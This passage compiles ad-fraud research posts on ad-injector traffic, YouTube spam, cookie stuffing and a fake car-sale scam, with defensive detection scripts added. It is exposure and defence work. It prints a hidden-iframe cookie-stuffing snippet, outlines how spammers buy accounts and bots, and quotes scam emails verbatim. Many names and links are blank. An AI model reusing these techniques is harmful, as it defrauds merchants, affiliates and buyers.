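    """Drop hosts that merely measure, so the next real broker is credited."""
    return [h for h in chain if h not in passive]


def tabulate(chains, passive=PASSIVE_TOOLS):
    """Return (intermediaries, advertisers), each mapping a name to
    (num_obs, Counter of the hops that sent traffic to it).

    Num. obs. counts ad calls, not impressions: an exchange that appears twice
    in one chain is counted twice, as the App Nexus footnote on this page notes.
    """
    inter_obs, adv_obs = Counter(), Counter()
    inter_snd, adv_snd = defaultdict(Counter), defaultdict(Counter)
    for chain in chains:
        c = strip_passive(chain, passive)
        if len(c) < 2:
            continue
        *hops, advertiser = c          # everything before the last hop brokers
        for prev, cur in zip(hops, hops[1:]):
            inter_obs[cur] += 1
            inter_snd[cur][prev] += 1
        adv_obs[advertiser] += 1
        adv_snd[advertiser][hops[-1]] += 1
    return ({h: (inter_obs[h], inter_snd[h]) for h in inter_obs},
            {a: (adv_obs[a], adv_snd[a]) for a in adv_obs})


def render(table, top=3):
    """Rows in the page's layout: name | num. obs. | top senders (count)."""
    rows = []
    for name, (n, senders) in sorted(table.items(), key=lambda kv: -kv[1][0]):
        top_senders = ", ".join(f"{s} ({k})" for s, k in senders.most_common(top))
        rows.append(f"{name} | {n} | {top_senders}")
    return rows


if __name__ == "__main__":
    inter, adv = tabulate(CHAINS)
    print("\n".join(render(inter)))
    print("\n".join(render(adv)))
```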

AddLyrics Injector – Graph of Intermediaries and Advertisers

In testing of September 6-12, 2013, we examined ads loaded by the AddLyrics ad injector. We checked injected ads 45,854 times. We monitored the resulting responses to determine the hosts that receive and pass along the resulting traffic. In the graph below we depict the ad networks, ad exchanges, and other advertising intermediaries (shown as ellipses in the graph) between an AddLyrics injection and the resulting advertisement (diamonds in the graph). We also report the advertisers most frequently observed. Color brightness and node size indicate the relative frequency of impressions to/via a given intermediary or advertiser.

Intermediaries brokering placements from AddLyrics

Intermediary | Num. obs. | Selected intermediaries sending impressions to that intermediary
 | 14001 | AppNexus (13998), (3)
AppNexus | 11854 | (4131), DNSR Media Group (2436), Yahoo Right Media (823)
Google DoubleClick | 7159 | AppNexus (2328), Invite Media (Google) (283), (267)
 | 6265 | AddLyrics Injector (6247), AppNexus (18)
Yahoo Right Media | 5287 | Yahoo (2235), AppNexus (859), Turn (243)
RewardsArcade | 5177 | (95), AppNexus (22), (5)
Yahoo | 4492 | Yahoo Right Media (2304), AppNexus (515), (199)
ContextWeb (DatranMedia / PulsePoint) | 4273 | AppNexus (292), (272), Turn (241)
 | 3288 |
Adap.TV | 3102 | (709), Turn (337), Neustar AdAdvisor (279)
Google | 2750 | Google DoubleClick (1249), (28), AppNexus (26)

Complete list of intermediaries available here

Advertisers receiving impressions from AddLyrics

Advertiser | Num. obs. | Selected intermediaries sending impressions to that advertiser
Systweak | 7230 | AppNexus, , Yahoo Right Media
 | 3403 | , AppNexus
 | 2882 | AppNexus,
 | 1891 | , AppNexus
 | 1441 | , AppNexus
 | 1347 | AppNexus,
 | 1336 | ,
Medical News Reporter | 1039 | AppNexus, ,
 | 1016 |
 | 903 | AppNexus, ,
 | 899 |
SiteScout | 899 | AppNexus,

Complete list of advertisers available here

PeachFuzz Injector – Graph of Intermediaries and Advertisers

In testing of September 6-12, 2013, we examined ads loaded by the PeachFuzz ad injector. We checked injected ads 48,653 times.

Intermediaries brokering placements from PeachFuzz

Intermediary | Num. obs. | Selected intermediaries sending impressions to that intermediary
AppNexus | 49829* | (14558), DNSR Media Group (4328), (3668)
 | 35830 | Peachfuzz Injector (35808), Adknowledge (14), AppNexus (8)
Google DoubleClick | 26877 | AppNexus (4163), MathTag (2239), Invite Media (Google) (1567)
Yahoo Right Media | 18323 | Yahoo (6322), AppNexus (1932), (1425)
Yahoo | 12292 | Yahoo Right Media (6369), Adknowledge (1112), (1025)
OpenX | 11378 | Adknowledge (2587), Rocket Fuel Inc. (2502), AppNexus (2437)
Google | 11158 | Google DoubleClick (5148), (1040), Underdog Media (434)
Turn | 9405 | OpenX (2484), AppNexus (1070), Yahoo Right Media (1022)
RewardsArcade | 9235 | (5067), (2842), (119)
eXelate | 7729 | Neustar AdAdvisor (999), Google DoubleClick (985), Btrll (893)
 | 7559 | AppNexus (2985), Google DoubleClick (744), Adknowledge (430)

* – We saw more than one App Nexus ad call in many Peachfuzz injection impressions. Example: Peachfuzz to App Nexus to some network X to App Nexus to some network Y to an advertiser. The number of App Nexus ad calls thus exceeds the number of Peachfuzz impressions we checked.

Complete list of intermediaries available here

Advertisers receiving impressions from PeachFuzz

Advertiser | Num. obs. | Selected intermediaries sending impressions to that advertiser
QuiBids | 2116 | OmniTarget, AppNexus
Living Research Institute | 2086 | Platinum Success
Draft Street | 2041 |
Pimsleur Approach | 1164 |
Medical News Reporter | 995 | AppNexus, , Yahoo Right Media
Anastasia Date | 924 | , AppNexus
Lower My Bills | 912 | AppNexus, Microsoft, Underdog Media
 | 866 | , AppNexus
Brightroll | 854 | AppNexus, Btrll
 | 783 | Secco Squared,
 | 715 | AppNexus,

Complete list of advertisers available here

WebCake Injector – Graph of Intermediaries and Advertisers

In testing of September 5-12, 2013, we examined ads loaded by the WebCake ad injector. We checked injected ads 15,834 times.

Intermediaries brokering placements from WebCake

Intermediary | Num. obs. | Selected intermediaries sending impressions to that intermediary
AppNexus | 13368 | Webcake Injector (2606), (1561), Microsoft (1265)
Google DoubleClick | 7363 | Webcake Injector (930), AppNexus (655), Btrll (422)
 | 6067 |
 | 6045 |
OpenX | 5016 | Adknowledge (1363), AppNexus (1259), Rocket Fuel Inc. (1100)
Yahoo Right Media | 4806 | Yahoo (1656), Webcake Injector (1187), AppNexus (518)
 | 3705 | Webcake Injector (3705)
Yahoo | 3306 | Yahoo Right Media (1669), Webcake Injector (1187), Turn (68)
eXelate | 3078 | Btrll (372), Google DoubleClick (363), Neustar AdAdvisor (360)
Turn | 2967 | OpenX (1072), Btrll (621), eXelate (318)
Adknowledge | 2721 | OpenX (1329), Webcake Injector (1066), AppNexus (293)
Bluekai | 2698 | Btrll (427), MathTag (425), Google DoubleClick (389)
Accuen | 2446 | Turn (1089), OpenX (1012), eXelate (315)
Btrll | 1903 | AppNexus (411), Datalogix (382), eXelate (381)
Rocket Fuel Inc. | 1875 | OpenX (1085), Btrll (621), Lijit (79)
 | 1596 | AppNexus (700), Webcake Injector (393), Google DoubleClick (286)

Complete list of intermediaries available here

Advertisers receiving impressions from WebCake

Advertiser | Num. obs. | Selected intermediaries sending impressions to that advertiser
 | 6102 | , Webcake Injector
Appround | 450 | , AppNexus
Brightroll | 406 | AppNexus, Btrll, Adknowledge
 | 156 | Google DoubleClick, Webcake Injector, Adknowledge
Facebook | 124 | Lotame, AppNexus,
 | 122 | , AppNexus, Webcake Injector
 | 81 | Webcake Injector, Yahoo Right Media
 | 79 | AppNexus
 | 76 | Ilissos/Eyeblaster
Systweak | 74 | AppNexus, Yahoo Right Media,
Sprint | 65 | Aggregate Knowledge

Complete list of advertisers available here


Our data reveals a stark disconnect between advertising industry claims and actual practices. For one, numerous ad networks claim to have severed ties with injectors, a claim often inconsistent with our data. For example, on October 24, 2012 Ad Exchanger reported that Rubicon Project, PubMatic, and OpenX claimed to have ceased working with Sambreel and its subsidiaries. But our data — collected nearly a year later — reveals that these firms actually continue to broker substantial Sambreel inventory (along with impressions from other injectors). Indeed, we found OpenX a top-five intermediary brokering Sambreel Webcake injection placements as of September 2013. Similarly, App Nexus claims not to work with Sambreel and claims that Sambreel’s injection tactic is unethical (“wrong”) — but in fact our crawler found that more than 80% of Sambreel Webcake impressions flow through App Nexus. Indeed, we found App Nexus the single largest broker of Sambreel Webcake traffic.

We also found injection traffic flowing to and through advertising intermediaries that affirmatively and prominently claim to have high quality standards. For example, Underdog Media tells advertisers that it places ads on “thousands of brand safe web sites” — never mentioning placements via ad injectors. Similarly, in the first sentence of its pitch to ad buyers, PubMatic promises “quality publishers” — describing “10,000+ sites” and “1,000+ quality publishers” but saying nothing of placements via ad injection. Nonetheless, our testing found widespread injection traffic flowing through these intermediaries.

By all indications, ad injectors use multiple names and convoluted relationships to hinder accountability. For example, at one point Sambreel’s “Businesses” page listed seventeen different brand names — some widely known by advertising professionals as performing ad injection; others relatively obscure. Sambreel subsequently removed this page and imposed a Robots.txt file blocking archival by although allowing all other crawlers. Advertising intermediaries seeking to avoid all Sambreel injections must find all of Sambreel’s product names (perhaps relying in part on others’ efforts, like a recent “unmasked” listing from ThreatTrack Security), then exclude every Sambreel product. Furthermore, they must also insist that their partners and their partners’ partners all do the same, lest injection traffic arrive indirectly. As a result, even diligent networks and advertisers struggle to avoid receiving injection inventory.

Advertising optimization systems further assist injectors. Injected ads are placed in top positions in popular sites, so measurement systems tend to report that these ads perform well — for example, high click-through rate and frequent conversions (i.e. purchases). Meanwhile, injectors need not create or organize articles or other content, reducing their costs and letting them sell injection inventory at modest prices. A standard advertising optimization platform would tend to view injection traffic favorably — good performance at competitive costs. As a result, an optimization platform would ordinarily elect to buy more injection traffic — even if an advertiser in fact views this traffic as unethical or otherwise unwanted. A network would need strong internal controls and manual checks to counter the optimization platform’s recommendation.

Our view of injectors is guided by the need to protect investment incentives so publishers have appropriate motivation to build, update, and improve their sites. Most publishers incur significant costs in gathering and distributing content. Similarly, online merchants make significant investments to design their sites and attract users. If injectors and other adware can grab this traffic for their own purposes, without authorization and without payment, then originating publishers and merchants see lower upside to their investments — less revenue to offset the production of quality content, and less impetus to pay to bring users to their sites.

Meanwhile, injectors clearly worsen the user experience by displaying more ads, slowing page-loads, and sharing information about users’ browsing patterns. For example, we found Peachfuzz inserting two large ads (a 728×90 and a 300×250) into the top of — pushing Amazon’s core home page offers down the page. Last year we found a similar problem at Travelocity, where large top-of-page ads forced users to scroll to conduct a basic flight or hotel search. Amazon and Travelocity would never choose this design, as it invites users to take their business elsewhere. But injectors need not consider sites’ usability or reputation.

With reference to the example screenshots above, injectors also show ads that publishers would never accept. If the Dell site were to show ads for other companies — which it does not and to our knowledge never has — we are confident that Dell would not allow ads from direct competitors. But injectors have no such constraint, and we found the Coupon Companion injector targeting Dell with a Best Buy ad. Meanwhile, Peachfuzz inserted a fake-user-interface “You need to update your media player” ad into Amazon and inserted “Lose the belly fat” and “Who’s been arrested” ads into CNN. By separating publishers from ad quality decisions, injectors undermine the market forces that ordinarily encourage publishers to require high ad quality.

Notably, some companies both profit from injectors and are targeted by injections. For example, Google Youtube is a top target of most injectors, including as shown in multiple screenshots above. We understand that Google has asked some injectors to stop targeting Youtube in this way, and in a statement to AdWeek, Google claims to have “banned [injectors] from using Google’s monetization and marketing tools.” Despite Google’s claim, our crawlers reveal injector impressions often passing through Google, including Google’s in-house display ad marketplaces, DoubleClick serving, and more recent acquisitions such as AdMeld.

Our data reveals that some advertising platforms have succeeded in avoiding injection inventory. Yet others have embraced injection traffic despite its serious problems. Remarkably, many advertising professionals seem to have at best a limited sense of which networks, exchanges, and other intermediaries are harboring injection traffic and allowing these practices to continue. Our reporting of top participants is a first step towards transparency in that regard.

YouTube Spam

By Wesley Brandi in CPL | Spam

Spend some time on YouTube and you may run into comments like

Make money working from home, get paid $$$ to fill in surveys. Go here…

Needless to say, the comments bring no value to the context of the video that you may be watching. More often than not it is exactly the same comment over and over, i.e., it’s YouTube Spam.

In this post, we try to answer the following :

  • How big of a problem is this spam for YouTube?
  • How do the spammers monetize?
  • What tools & tricks are employed by the spammers?

Scope of the Problem

If we were on the backend of YouTube, we could take a naive approach to appreciating this problem:

“These are all our videos (N). Each video may be connected to a set of tainted comments (T); We consider a set of comments to be tainted when it contains spam. Having defined a function to determine if a set is tainted, we then get an idea of the scope of this problem by dividing T into N”

Of course, it doesn’t take into account the rank of each spammy comment, but that’s why this is called a naive approach.

Now we’re not on the backend of YouTube, but we are privy to the very front end of YouTube. In fact, we try to get a rough idea of how much of a problem this is by taking a look at only the default page presented when visiting This approach should work well for us because

  • it’s a whole lot smaller than N above, so it’s reproducible for the folks at home
  • it’s a page with massive traffic so will have massive attention from the spammers
  • it’s a page with massive traffic so will have massive attention from the YouTube abuse team

The following YouTube page was loaded at approximately 5pm on 8/5/2013

There are 40 videos presented on the front page. If you’re going to try this for yourself at home, then you need to click on each of the videos and scroll down into the comments. Fortunately (or not), you don’t have to scroll very far because the spammers have a knack for having their comments placed right at the top. What you’re looking for is something like this:


For this particular sample set, we were quite surprised to find that 9 of the 40 videos had tainted comments:

Now 22.5% of the front page videos having tainted comments may not sound like an awful lot, but when you consider that this is for the third most popular page on earth (Alexa Rank #3), then what’s going on here starts to take on a whole new perspective.

Monetization Path

So what’s really going on here?

At the very least, we know that spammers are targeting a significant percentage of the videos on YouTube’s front page. Of course, they’re not doing this for their health so how do they make their money?

Consider the comment on the first highlighted video presented:


This is how i am making tons of money every single month working at my house..

Step 1: Follow the guide on this page:\nb1Bak

Step 2: Get paid 5-20 bucks to answer each survey

Step 3: Retire and move overseas

This is a packet trace of the network activity on a machine when you browse in a browser:

  • is Google’s URL Shortener.
  •\nb1Bak redirects to which redirects to
  • This then redirects to

“So is the spammer?”

No, is not the spammer. Surveyjunkie is an advertiser in a Cost Per Lead (CPL) advertising model. They have an affiliate program which rewards affiliates when users sign up (leads). The spammer in this scenario is one of surveyjunkie’s affiliates (specifically ‘klenzxcp’), who is paid a finder’s fee when YouTube users sign up with

Now this may or may not violate surveyjunkie’s acceptable use terms, although I could not find a policy detailing these terms. Of interest from the packet trace is that the Web request through to does not contain a referrer header, so surveyjunkie does not get to know where the traffic comes from. So they won’t know that it’s YouTube spam. One could argue that they choose not to know, but who is going to argue that?

“Okay but this is just a once off, you’ve only analyzed one comment”

Actually we analyzed all outbound links on all of the tainted comments. In this case all roads lead to via two affiliates (klenzxcp and gqrzv5sx):

Modus Operandi

Obviously the spammers are capitalizing on a great source of traffic. You could argue that the traffic is free but you would be wrong. The traffic is pretty cheap, but it’s not free. If you were going to pull this off yourself as a spammer new to the scene, then you’d need a couple of things:

  • A set of accounts to post the initial spam as a comment (A). Any spammer worth his weight will suggest using Phone Verified Accounts. You could set these up yourself or you could buy 10 for $5


  • A set of accounts (B) to thumbs up the comments posted by set A. This is how the spammers get to the top of the comment’s section. For each comment posted by A, a group of approvers from B will come along and give it a thumbs up which will quickly push it to the top. Naturally the size of B must be greater than the size of A. You can buy 100 regular (non PVA) YouTube accounts for $5


  • The tricky part is writing a tool that will monitor the front page of YouTube and post comments (with approval from set B) on each of the videos that have not yet been targeted. Not too difficult if you have Compsci 101 behind you (or even just a few weeks fiddling with Python/Java/.Net…). You won’t have to write it yourself though, because there are plenty of bots that already do this for you (with captcha support!). Expect to spend anywhere from $50 to $150.

The costs above are not where it ends. If you refresh a video with tainted comments for a while, you will notice that the tainted comment does eventually disappear (feedback from the community marks it as bad). Of course, sit a little while longer and the tainted comment will return. So as much as the YouTube abuse team is fighting the spammers back, the spammers are constantly increasing the size of set A and B.

“It’s all out war out there! What’s an abuse team to do?”

This is not a trivial problem to solve. What surprised me the most from analyzing YouTube spam comments is that the same comment, after being taken down, will quickly make its way back to the top. I’d make a bet that there’s low-hanging fruit to be had here by combining user feedback on tainted comments with a unique hash of the comment itself. In doing so one could block the comment at the front door.

“Yeah right, the spammers will then simply diversify each comment enough to avoid whatever filter is put in place”

Sure. The trick here is then to get to the root of the problem and really put a dent in their armour: identify outbound CPL links.
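One way to build the front-door check sketched above, combining the comment-hash idea with resolution of outbound links to a CPL destination (added example, not code from the original post; the shortener, tracker and offer hostnames, the redirect map and the affiliate id are constructed stand-ins for the chain the packet trace showed):

```python
"""Front-door filter for repeated spam comments, as sketched in this post.

Added example, not code from the original post. Two checks: (1) a hash of the
normalised comment text, blocked once community feedback on that text crosses a
threshold, which survives the cosmetic edits spammers make; (2) every outbound
link is followed through its redirect chain to see whether it lands on a known
cost-per-lead (CPL) affiliate destination, the root the post points at.
"""
import hashlib
import re
from collections import Counter
from urllib.parse import urlparse

URL_RE = re.compile(r"(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?:/\S*)?", re.I)

# Constructed stand-in for the shortener -> tracker -> offer chain the post traced;
# a live deployment would issue the requests and read the Location headers.
REDIRECTS = {
    "http://short.example/b1Bak": "http://track.example/go?aff=AFFILIATE-ID-PLACEHOLDER",
    "http://track.example/go?aff=AFFILIATE-ID-PLACEHOLDER": "http://cpl-offer.example/signup",
}
CPL_HOSTS = {"cpl-offer.example"}    # constructed list of CPL landing hosts
FLAG_THRESHOLD = 3                    # community reports before a hash is blocked


def normalise(text):
    """Lower-case, drop links and punctuation, collapse whitespace, so that a
    swapped link or a few extra dots still produce the same hash."""
    text = URL_RE.sub("", text.lower())
    text = re.sub(r"[^a-z0-9 ]+", " ", text)
    return " ".join(text.split())


def comment_hash(text):
    return hashlib.sha256(normalise(text).encode()).hexdigest()


def resolve(url, redirects=REDIRECTS, max_hops=10):
    """Follow the (simulated) redirect chain and return the final URL."""
    if not url.lower().startswith(("http://", "https://")):
        url = "http://" + url
    for _ in range(max_hops):
        nxt = redirects.get(url)
        if nxt is None:
            return url
        url = nxt
    return url                        # loop or over-long chain: report last hop


class CommentFilter:
    def __init__(self):
        self.flags = Counter()        # comment hash -> community spam reports
        self.blocked = set()

    def report(self, text):
        """Record one community 'spam' report; block the hash at the threshold."""
        h = comment_hash(text)
        self.flags[h] += 1
        if self.flags[h] >= FLAG_THRESHOLD:
            self.blocked.add(h)

    def check(self, text):
        """Return None to accept the comment, or a reason string to reject it."""
        if comment_hash(text) in self.blocked:
            return "repeat of community-flagged comment"
        for m in URL_RE.finditer(text):
            host = (urlparse(resolve(m.group(0))).hostname or "").lower()
            if host in CPL_HOSTS:
                return "outbound link resolves to CPL affiliate " + host
        return None


# Constructed comment modelled on the one quoted in the post.
SPAM = ("This is how i am making tons of money every single month working at my "
        "house.. Step 1: Follow the guide on this page: short.example/b1Bak "
        "Step 2: Get paid 5-20 bucks to answer each survey")

if __name__ == "__main__":
    f = CommentFilter()
    print(f.check(SPAM))
```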

If you are a Linkshare affiliate competing for the same traffic as today’s rogue affiliate, know that you do not stand a chance. The reason is that Linkshare affiliate ‘smaqEgQUEvQ’ is unfairly using Cookie-Stuffing techniques to maximize his affiliate revenue.

Let’s look at how the scam is put together.

When visiting this page on, casual inspection yields nothing out of the ordinary.


Open up the HTML source behind this page and scroll to line 279, note the hidden iframe (with a 1×1 height/width and CSS display set to none) pointing to a Linkshare affiliate click link:

<IFRAME SRC="[Linkshare affiliate click link, omitted]" WIDTH=1 HEIGHT=1 FRAMEBORDER=1 style="display:none"></IFRAME>

This HTML invisibly loads the affiliate click link and, in turn, the merchant it routes through to (pushing the applicable cookies onto the user’s machine); in this case it is . I dynamically modified the page to reveal the hidden content; follow the red arrow below.



As is unfortunately the case with Cookie-Stuffing, the merchant will pay an unearned commission to the rogue affiliate should the user make a purchase within a predefined amount of time. So the merchant will lose and honest affiliates lose as well (for their cookies may have been overwritten).

Can’t reproduce this for yourself? This packet trace confirms the behavior in question.

I give this fraudster a 1/10.

  • 1 point for basic Cookie-Stuffing


Upon casual inspection, reviews antivirus solutions for your PC. In their own words:

We recommend you the best antivirus software for your PC. Our reviews and recommendations are balanced from the performance, budget and easy to use. Below are the Top 3 Antivirus programs that will give you the best performance and are Worth The Value You Pay For!


There’s a little more to this site than meets the eye. When you visit each of the pages for the products reviewed, is invisibly forcing affiliate cookies associated with the product in question onto your machine. The idea is that if you end up buying one of these products further down the road, Bestpcantivirus will be paid a commission, since it will appear to be the entity responsible for the purchase. This would be fine if you had clicked through on the appropriate affiliate click links, but that’s not what happens here, i.e., Bestpcantivirus is playing the game unfairly. If you are an affiliate competing for the same traffic then you are going to lose.

Line 43 in the HTML source of this bestpcantivirus page has an IMG tag with a src attribute set to a link which will redirect through to an affiliate click link (CJ affiliate id 5727502) and then onto Norton.


Bestpcantivirus knows what they are doing is wrong, so they set the width and height attributes of this malformed image to 1×1, this way you won’t see it if you are just browsing casually. I dynamically modified the DOM to alter the dimensions of this image to 50×50, the red arrow highlights what is really going on:


As always, if you can’t reproduce this for yourself, this packet trace confirms the activity.

I give this scammer a 2/10:

  • 1 point for the most basic form of Cookie-Stuffing
  • 1 point for Cookie-Stuffing multiple merchants:
    Merchant CJ Affiliate Id
    AVG 5727502
    Eset 3840211
    F-Secure 3840211
    Kaspersky 5727502
    Pandasecurity 5727502
    Zonealarm 3840211
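A defender-side scanner for the two cookie-stuffing patterns seen in this post and in the Linkshare post above, the hidden IFRAME and the 1×1 IMG pointing off-site (added example, not the author’s code; the sample page, hostnames and affiliate id are constructed):

```python
"""Flag cookie-stuffing candidates in an HTML page.

Added example, not code from the original posts. It looks for the two patterns
the posts describe: a hidden IFRAME (1x1 and/or display:none) and a 1x1 IMG
whose src points off-site, typically at an affiliate click link or redirector.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed list of affiliate click-link hosts; a real deployment would keep
# its own list of the networks' redirector domains.
AFFILIATE_CLICK_HOSTS = {"click.affiliatenetwork.example"}


def _is_tiny(attrs):
    """1x1 (or 0x0) width/height, the size both posts found on the hidden tags."""
    return attrs.get("width", "").strip() in ("0", "1") and \
        attrs.get("height", "").strip() in ("0", "1")


def _is_display_none(attrs):
    return re.search(r"display\s*:\s*none", attrs.get("style", ""), re.I) is not None


class CookieStuffScanner(HTMLParser):
    """Collect hidden IFRAME/IMG elements whose src leaves the page's own host."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "img"):
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        if not host:
            return      # relative src: follow its redirects separately (the posts used a packet trace)
        hidden = _is_tiny(a) or _is_display_none(a)
        off_site = host != self.page_host
        known = host in AFFILIATE_CLICK_HOSTS
        if hidden and (off_site or known):
            line, _ = self.getpos()     # line of the tag, as the posts cite
            self.findings.append({
                "line": line, "tag": tag, "src": src, "host": host,
                "known_affiliate_host": known,
            })


def scan(html, page_host):
    """Return the list of suspicious elements found in html."""
    scanner = CookieStuffScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: a normal banner, the site's own 1x1 pixel, a hidden
# affiliate IFRAME as in the Linkshare post, and a 1x1 IMG through a redirector
# as in the bestpcantivirus post.
SAMPLE_HTML = """<html><body>
<img src="http://www.example-publisher.test/banner.png" width="728" height="90">
<img src="http://www.example-publisher.test/pixel.gif" width=1 height=1>
<IFRAME SRC="http://click.affiliatenetwork.example/click?id=AFFILIATE-ID-PLACEHOLDER" WIDTH=1 HEIGHT=1 FRAMEBORDER=1 style="display:none"></IFRAME>
<img src="http://go.redirector.example/r?merchant=example-av" width="1" height="1">
<img src="http://cdn.other-site.example/logo.png" width="200" height="50">
</body></html>"""

if __name__ == "__main__":
    for f in scan(SAMPLE_HTML, "www.example-publisher.test"):
        print(f"line {f['line']}: hidden <{f['tag']}> to {f['host']} "
              f"(known affiliate host: {f['known_affiliate_host']})")
```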

Recall that the Bargain Hunter scam is a four-pronged attack:

1. Scammer Sets the Trap

This ad has a 2002 Toyota Tacoma PreRunner up for grabs at $5,582.

It’s a pretty good deal, designed to whet my appetite and have me get in touch with the seller thinking that there’s a great deal here, i.e., it’s an entry point to a Bargain Hunter scam.

2. Victim Takes the Bait

First response from the seller:

From: Jessica Hale (
Subject: used car lead for Juanna - 2002 Toyota Tacoma

I still have my  2002 Toyota Tacoma Double Cab SR-5 TRD Pre-runner 
with 3.4 V-6, automatic transmission.Used 128k miles ,VIN# 
5tegn92n72z012744 .

I will take only $5500 total price shipping included from Medford OR,
i have my own trailer to have the truck delivered to you.It has a 
clear title ready to be signed and notarized on your name.

Runs great,no problems at all,garage kept only.  I can offer a 7 days 

More pics attached here:

The Photobucket link shows pictures of the car that are not available in the original ad (so this must be legit, right?)

3. Scammer Gains Victim’s Trust

It stands to reason that nobody in their right mind would engage in a financial transaction involving a large sum of money, someone they have never met and a car they have never seen. More so when the first act of good faith must come from the buyer, i.e., send the money first and then you will receive the goods.

Ah, but what about an entity that I trust? I do transactions of this nature every day with Amazon right? So of course I will send money to them and then wait for delivery, if not for any other reason than they always deliver no matter what. Doesn’t take much to see how scammers will exploit this.

Email correspondence eventually received from the scammer when asking about how the transaction will take place:

From: Jessica Hale (
Subject: used car lead for Juanna - 2002 Toyota Tacoma

I have a contract with Amazon Payments so we can go through 
their Protection Program.

According with  the Amazon you have 7 days after you receive 
the car to inspect it and decide if you want to BUY IT or NOT.

Here is how it will work:

 1.First of all I will need  the following details from you:
 - Full Name
 - Full Address

 2. After I will receive the details from you, I will forward 
 them to Amazon.

 3. After they will process your info, they will send us both 
 invoices. You will receive the invoice with the details on 
 how to make a refundable payment to Amazon.They will hold 
 your payment while you test and inspect the vehicle at your
 home for a week.

 4. Amazon will contact me to ship the car to you. After you 
 receive the car you will have 7 days to test, verify and do 
 whatever you need to the car.  If you will decide to buy the 
 car, then I will get  the money from Amazon.

 5. If you will decide that you do not buy the car,  Amazon 
 will refund your payment same day.

I look forward to hearing from you . 

Thank you

Upon accepting these terms, I quickly got an email from someone claiming to be Amazon. The Amazon email actually comes from a Live account: Amazon FPS (

4. Victim Sends Money

Once I send the money through Money Gram then it’s gone. I won’t hear from the seller again and the car will never arrive. I could get in touch with Amazon but they won’t know what I’m talking about (obviously because they were never involved).

I give this scammer 1/10:

  • 1 point for a very basic Bargain Hunter scam

As is usually the case, the scammer could have done a lot more here to improve the scam. He didn’t screen calls, he didn’t sample responses and he did not go the extra mile when I asked for additional photos of the rear view mirror (saying that his kids broke his camera). Like most of the drivel out there, he is a bottom of the barrel scammer.

So sad to think that sooner or later the scammer behind this ad is going to catch another victim, he wouldn’t be doing this otherwise.